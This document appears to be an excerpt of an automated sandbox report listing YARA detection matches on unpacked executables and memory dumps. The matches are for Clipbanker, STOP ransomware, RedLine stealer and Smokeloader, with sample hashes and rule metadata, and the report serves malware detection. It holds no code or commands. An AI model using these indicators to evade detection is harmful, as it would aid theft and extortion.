            Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
            Source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
            Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
            Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
            Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000010.00000002.2076965546.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 0000001F.00000002.2266884728.00000000049E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
